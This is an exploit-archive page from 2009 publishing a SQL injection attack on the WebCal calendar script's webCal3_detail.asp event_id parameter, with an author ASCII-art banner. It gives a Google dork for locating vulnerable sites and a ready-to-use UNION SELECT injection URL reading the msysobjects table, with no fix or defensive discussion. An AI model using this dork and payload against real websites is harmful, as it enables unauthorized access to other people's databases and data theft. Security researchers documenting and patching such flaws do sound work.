[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : WebCal (webCal3_detail.asp event_id) SQL Injection Vulnerability
# Published : 2009-06-02
# Author : Bl@ckbe@rD
# Previous Title : Flashlight Free Edition (LFI/SQL) Multiple Remote Vulnerabilities
# Next Title : PropertyMax Pro FREE (SQL/XSS) Multiple Remote Vulnerabilities
000000 00000 0000 0000 000 00 000000 0000000 0000 000000 00000
0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0
0 0 0 0 00 0 0 0 0 0 0 0 0 00 0 0 0 0 0
0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0
00000 0 0 0 0 0 0 0 0 00000 0000 0 0 0 0 00000 0 0
0 0 0 0 0 0 0 0 000 0 0 0 0 0 0 0 0 0 0 0 0
0 0 0 0 000 0 0 0 0 0 0 0 000 0 0 0 0
0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0
000000 0000000 000 0000 000 00 000000 0000000 000 000 00 00000
(
[+] Script : WebCal (latest version)
[+] Exploit Type : Remote sql injection exploit
[+] Google Dork : inurl:/webCal3_detail.asp?event_id=
[+] Contact : blackbeard-sql A.T hotmail.fr
--//--> Exploit :
Remote sql injection Exploit :
http://[website]/[script]/webCal3_detail.asp?event_id=20814+union+select+1,2,3,4,5,6,7,8,9,10+from+msysobjects
[peace xD]
# www.Syue.com [2009-06-02]